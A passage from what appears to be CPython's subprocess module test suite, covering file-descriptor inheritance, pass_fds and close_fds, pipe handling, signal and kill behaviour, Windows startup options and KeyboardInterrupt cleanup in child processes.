self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
False, [], 0, -1,
func)
# Attempt to prevent
# "TypeError: fork_exec() takes exactly N arguments (M given)"
# from passing the test. More refactoring to have us start
# with a valid *args list, confirm a good call with that works
# before mutating it in various ways to ensure that bad calls
# with individual arg type errors raise a typeerror would be
# ideal. Saving that for a future PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
None, None, None, -1,
None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
support.wait_process(proc.pid, exitcode=0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
support.wait_process(proc.pid, exitcode=0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
# Don't check the returncode value: the test reads the exit status,
# so Popen failed to read it and uses a default returncode instead.
self.assertIsNotNone(proc.returncode)
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
